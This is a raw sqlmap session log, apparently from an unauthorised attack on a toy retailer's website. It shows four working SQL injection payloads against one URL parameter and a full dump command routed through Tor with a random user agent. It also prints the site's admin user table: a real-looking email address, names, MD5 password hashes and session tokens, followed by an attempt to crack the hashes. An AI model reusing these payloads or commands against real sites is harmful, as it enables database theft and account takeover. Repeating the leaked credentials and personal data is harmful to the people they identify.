sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: subCatID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: catID=14&subCatID=49 AND 7061=7061 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: catID=14&subCatID=49 AND (SELECT 6933 FROM(SELECT COUNT(*),CONCAT(0x7170707671,(SELECT (CASE WHEN (6933=6933) THEN 1 ELSE 0 END)),0x71786b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 16 columns Payload: catID=14&subCatID=49 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170707671,0x484b4464686652726659,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: catID=14&subCatID=49 AND SLEEP(10) --- [10:07:00] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL 5.0 [10:07:00] [INFO] fetching columns for table 'bo_users' in database 'barryowen' Database: barryowen Table: bo_users [10 columns] +----------------+------------------+ | Column | Type | +----------------+------------------+ | dateAdded | datetime | | firstname | varchar(100) | | lastname | varchar(100) | | password | varchar(100) | | privAdmin | enum('Yes','No') | | sessIdentifier | varchar(50) | | sessTimeout | int(10) unsigned | | sessToken | varchar(50) | | userID | bigint(20) | | username | varchar(100) | +----------------+------------------+ [10:07:02] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.barryowen.com' [*] shutting down at 10:07:02 root@ sqlmap --tor --tor-type=SOCKS5 --random-agent --check-tor -u "http://www.barryowen.com/toys.php?catID=14&subCatID=49" -p subCatID -D barryowen -T bo_users --dump _ ___ ___| |_____ ___ ___ {1.0-dev-9fff88d} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 10:07:46 [10:07:46] [WARNING] increasing default value for option '--time-sec' to 10 because switch '--tor' was provided [10:07:46] [INFO] setting Tor SOCKS proxy settings [10:07:46] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ru-ru) AppleWebKit/533.2+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10' [10:07:46] [INFO] checking Tor connection [10:07:49] [INFO] Tor is properly being used [10:07:49] [INFO] resuming back-end DBMS 'mysql' [10:07:49] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: subCatID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: catID=14&subCatID=49 AND 7061=7061 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: catID=14&subCatID=49 AND (SELECT 6933 FROM(SELECT COUNT(*),CONCAT(0x7170707671,(SELECT (CASE WHEN (6933=6933) THEN 1 ELSE 0 END)),0x71786b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 16 columns Payload: catID=14&subCatID=49 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170707671,0x484b4464686652726659,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: catID=14&subCatID=49 AND SLEEP(10) --- [10:07:51] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL 5.0 [10:07:51] [INFO] fetching columns for table 'bo_users' in database 'barryowen' [10:07:51] [INFO] fetching entries for table 'bo_users' in database 'barryowen' [10:07:53] [INFO] analyzing table dump for possible password hashes [10:07:53] [INFO] recognized possible password hashes in columns 'password, sessToken, sessIdentifier' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] do you want to crack them via a dictionary-based attack? [Y/n/q] [10:08:00] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > [10:08:00] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] [10:08:01] [INFO] starting dictionary-based cracking (md5_generic_passwd) [10:08:01] [INFO] starting 8 processes [10:08:22] [WARNING] no clear password(s) found [10:08:22] [INFO] postprocessing table dump Database: barryowen Table: bo_users [2 entries] +--------+----------------------------------+----------------------+----------+----------------------------------+---------------------+-----------+----------------------------------+-----------+-------------+ | userID | sessIdentifier | username | lastname | password | dateAdded | firstname | sessToken | privAdmin | sessTimeout | +--------+----------------------------------+----------------------+----------+----------------------------------+---------------------+-----------+----------------------------------+-----------+-------------+ | 1 | 33a5f6e9227e60a3af2fe1afc457e91e | meatch@mac.com | Gohman | 59ed7d55a1471f53c7e862b2ace5e757 | 2010-02-28 11:07:28 | Mitchell | b1ca0d0bef6bd475feb89567828e5f99 | Yes | 1272056589 | | 2 | 86acdc20e5a93fd0e1729cc955ef59fd | admin@barry-owen.net | admin | b68070e8e5b207cd886f0c7786abad02 | 2010-04-19 23:30:33 | admin | 1609ae71f6845e5bfa85d25a059df4d6 | Yes | 1416095897 | +--------+----------------------------------+----------------------+----------+----------------------------------+---------------------+-----------+----------------------------------+-----------+-------------+